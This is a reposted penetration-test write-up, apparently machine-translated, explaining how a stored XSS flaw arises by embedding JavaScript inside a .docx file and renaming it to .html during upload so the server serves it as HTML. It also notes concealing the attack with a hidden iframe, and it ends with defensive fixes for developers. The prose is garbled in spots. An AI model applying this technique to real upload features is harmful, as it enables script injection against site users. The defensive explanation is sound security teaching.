Shulou(Shulou.com)06/01 Report--

How to understand how to upload Word files to form a storage XSS path, I believe that many inexperienced people are at a loss about this. Therefore, this paper summarizes the causes and solutions of the problem. Through this article, I hope you can solve this problem.

In the process of penetration testing, whenever I see the upload function of the target test site, it always arouses my curiosity. If you are lucky, if the target site server is PHP or ASP architecture, and the upload function is not suffixed filtered, this can lead to direct upload of the bounce script to form control. If the China Merchants Bank fails, I will try to upload a HTML page to trigger the client-side javascript script I set up to form a XSS attack. I will share an example of uploading docx files to create a storage XSS vulnerability.

Test upload function

During a Web test, I found that the upload function of the target site allows users to upload their own files with an unauthorized user, which allows users to upload .docx files: when this .docx file is uploaded, it can also be downloaded. By comparison, it is found that there are some differences between the successfully uploaded file uploaded.docx and the corresponding downloadable file downloaded.docx on the server, that is, after the file is successfully uploaded, before downloading is provided, the server will do some processing on the uploaded file, and then provide the download.

The file used to upload must be a valid .docx file, so based on the browser parsing display, it may convert it to html format to display, can I make a change to its suffix? So let me first try changing the .docx suffix to .html in the POST request:

When the .html file is uploaded and the server requests the file, the server defaults its Content-Type header to text/html, so the browser parses the file to HTML execution:

Insert XSS Payload

In this way, I came up with the idea of bundling XSS Payload into a .docx zip file like the one below. Since this is an example of a compressed format package in which .docx has directly changed its suffix to .zip, I need to identify some areas that will not be dumped during upload or Web parsing. Finally, I found that some file paths in this docx variable zip compressed format package will remain the same. Like the following figure, I added a long list of letters to the Settings.xml file name to be distinguished. After that, I restore the zip suffix to docx format, view the hex code with UItraEdit, overwrite some bytes in the area that remains as it is, and insert the JavaScript XSS code I set up:

When uploading, the server can normally receive the constructed .docx file. During the HTTP POST process, I changed its suffix to the .html suffix for the final upload: when requesting this file from the server, it can be parsed into a HTML file by the server, which contains the complete XSS Payload code inserted before: of course, after the browser parses The XSS Payload inserted in it can also be executed successfully: in order to confuse and conceal this XSS attack, an attacker can add a hidden iframe framework containing the URI uniform resource identifier, which can confuse the victim, as shown below:

Protective measures

For developers, this effect should be limited by the following measures.

Before uploading the file, verify that the uploaded file format is a valid .doc or .docx format on the server side

Content-Type headers are strictly restricted. Uploaded files that have changed the format of Content-Type headers or specific suffixes must maintain the same Content-Type header information as uploaded files.

To control other operations when downloading the file, add a response header: "Content-Disposition: attachment" to prevent the file from being embedded in the browser

Filter out all uploads that contain HTML tags because docx can be compressed to tamper with the HTML files it contains.

After reading the above, do you understand how to upload Word files to form a storage XSS path? If you want to learn more skills or want to know more about it, you are welcome to follow the industry information channel, thank you for reading!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.